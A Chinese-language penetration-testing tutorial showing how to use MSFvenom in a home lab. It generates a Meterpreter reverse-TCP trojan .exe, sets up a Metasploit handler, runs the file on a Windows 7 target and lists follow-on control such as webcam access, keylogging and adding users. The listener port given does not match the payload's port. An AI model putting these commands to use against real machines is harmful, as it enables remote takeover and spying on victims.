MSFvenom恶意程序生成与利用
MSFvenomhttps://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/msfvenom1_h1377D64D-1FF6-443B-866D-CDF18F45103B.png1.1 MSFvenom介绍
MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载,如Android,Windows,Unix,Nodejs,Cisco等等。
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/msfvenom2_english1377D64D-1FF6-443B-866D-CDF18F45103B.png
英文介绍来源:https://www.offsec.com(网站有风险打开需谨慎)
1.2 MSFvenom 简单使用
示例说明:今天利用MSFvenom 制作一个 .exe 的木马文件,然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行(这里为了加深了解永恒之蓝操作,也可以手动发送至win7)。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。
1.2.1 MSFvenom手册
#> man msfvenomhttps://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/msfvenom3_man1377D64D-1FF6-443B-866D-CDF18F45103B.png1.2.2 环境介绍
攻击机:
项目参数备注机器类型攻击机操作系统kaliIP地址192.168.2.214https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/msfvenom4_ifconfig1377D64D-1FF6-443B-866D-CDF18F45103B.png靶机:
项目参数备注机器类型靶机操作系统win7关闭防火墙卸载相关杀毒软件IP地址192.168.2.233https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/msfvenom5_win7ipconfig1377D64D-1FF6-443B-866D-CDF18F45103B.png
1.2.3 木马文件生成
#>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe命令解说:
命令说明备注windows/meterpreter/reverse_tcp有效载荷类型,可以根据实际情况进行选择LHOST攻击机的IP,即靶机点击程序后回链的ipLPORT攻击机的端口,即靶机点击程序后回链的端口-f输出的格式https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/A6_createfile1377D64D-1FF6-443B-866D-CDF18F45103B.png
1.2.4 设置侦听
启动msfconsole
#> msfconsole 设置监听
msf6>use exploit/multi/handler
msf6>set payload windows/meterpreter/reverse_tcp
msf6>set lhost 192.168.2.214 #攻击机ip
msf6>set lport 10200 #链接端口
msf6>exploit/run #运行https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/A7_openlis1377D64D-1FF6-443B-866D-CDF18F45103B.png
1.2.5 在靶机中运行程序
将文件拷贝到靶机并运行(直接拷贝或通过永恒之蓝漏洞上传,参考《渗透基础+永恒之蓝演练》)。
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/A7-1_run1377D64D-1FF6-443B-866D-CDF18F45103B.png
1.2.6 程序生效,执行相关SHELL
运行1.exe文件
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/A8_run1377D64D-1FF6-443B-866D-CDF18F45103B.png
在运行的瞬间,kali就已经监听并链接成功!下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/A9_ok1377D64D-1FF6-443B-866D-CDF18F45103B.png
普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/gjfgsjk.png
https://gitee.com/fangyuxiSoft/blog-pic/raw/master/img/wlaqf.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]